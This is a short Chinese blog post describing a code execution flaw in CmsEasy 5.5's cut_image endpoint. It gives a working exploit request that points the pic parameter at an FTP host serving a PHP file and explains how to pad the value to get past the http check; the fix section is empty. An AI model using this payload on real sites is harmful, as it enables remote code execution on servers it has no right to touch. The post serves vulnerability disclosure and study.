CmsEasy 5.5 cut_image 代码执行漏洞

2018-03-08  本文已影响416人  此间不留白

0x01 漏洞原理


post /index.php?case=tool&act=cut_image

pic=1ftp://172.16.11.2/phpinfo.php&w=700&h=112&x1=0&x2=112&y1=0&y2=112

注意:$_POST['pic']是通过判断前4个字符不是 http,则认为文件是本站文件,会从前面抽取掉baseurl,返回文件相对路径。所以构造的时候,如果站点不是放在根目录,则需要补位strlen(base_url)+2 如果放在根目录 也需要补上1位('/'的长度)所以构造pic=1ftp,补齐位数。

漏洞复现

1.PNG 2.PNG ![4.PNG](https://img.haomeiwen.com/i3130464/39a5f102139d676d.PNG?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) 4.PNG

漏洞修复

上一篇 下一篇

猜你喜欢

热点阅读